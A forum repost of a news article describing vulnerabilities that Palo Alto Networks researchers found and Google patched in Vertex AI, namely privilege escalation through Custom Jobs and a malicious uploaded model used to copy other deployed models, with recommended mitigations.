How to steal an AI model in a couple of clicks? Researchers Reveal Vulnerabilities in Google Vertex AI

Man

Professional
Messages
3,070
Reaction score
606
Points
113
No one suspected that hacking the popular platform would be so easy.

Palo Alto Networks has discovered a number of vulnerabilities in Google's Vertex AI platform that could allow attackers to steal valuable machine learning (ML) models and large language models (LLMs) developed internally. These vulnerabilities include the ability to escalate privileges and exfiltrate data through infected models.

The first vulnerability concerned privilege escalation through Custom Jobs in Vertex AI Pipelines. Using these jobs, the researchers were able to access data they shouldn't have had access to, including cloud storage and BigQuery tables. Attackers could take advantage of this to download sensitive data and models.

The second vulnerability turned out to be even more dangerous. The researchers showed that when an infected model is uploaded from a public repository to the Vertex AI platform, it can access all other models already deployed in the environment. This allows attackers to copy and siphon customized models and customized LLM layers that may contain unique and sensitive information.

In the course of the study, experts created their own infected model and deployed it in the Vertex AI test environment. After that, they were able to access the platform's service account and steal other models, including adapter files used to configure the LLM. These files are key elements that contain weights that can significantly change the behavior of the underlying model.

The study found that deploying even one model without thorough verification can lead to a leak of a company's intellectual property and data. To avoid such threats, the researchers recommend isolating test and production environments, as well as strictly controlling access to the deployment of new models.

Google quickly responded to the vulnerabilities discovered by researchers by releasing updates and implementing patches that eliminated potential attack paths. Now the Vertex AI platform has become much more secure, minimizing the risks of unauthorized access and data leakage.

Any vulnerable AI model can become a Trojan horse that opens access to the entire infrastructure of the company. In an age where data is the main weapon, even a single missed moment of security can cost millions of dollars. Only strict control and constant verification of each stage of deployment can protect intellectual assets from leakage.

Source
 
Top